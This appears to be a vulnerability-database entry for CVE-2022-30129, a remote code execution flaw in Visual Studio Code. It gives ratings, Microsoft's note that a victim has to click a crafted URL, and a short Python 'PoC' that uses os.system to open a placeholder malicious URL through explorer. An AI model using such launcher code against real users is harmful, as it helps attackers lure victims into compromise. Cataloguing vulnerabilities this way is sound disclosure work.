Attacker Value
High
(1 user assessed)
Exploitability
High
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
1

CVE-2022-30129

Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Validated
Validated
Validated

Description

Visual Studio Code Remote Code Execution Vulnerability.

Add Assessment

0
Ratings
  • Attacker Value
    High
  • Exploitability
    High
Technical Analysis

Vendor

  • Platform Windows 11

Description:

Visual Studio Code latest version – Remote Code Execution Vulnerability.
The user would have to click on a specially crafted URL inside when he edits the code or just executed an already compiled malicious program, to be compromised by the attacker.

Microsoft:

  • FAQ:
According to the CVSS metric, user interaction is required (UI:R). What interaction would the user have to do?
The user would have to click on a specially crafted URL to be compromised by the attacker.

PoC

#!/usr/bin/python
# Author: nu11seur1ty
# CVE CVE-2022-30129
import os

# The security encrypted link to the company!
os.system("explorer \"_Your_malicious_URL_here")


Proof and Exploit:

href

General Information

Vendors

  • Microsoft

Products

  • Visual Studio Code

Additional Info

Technical Analysis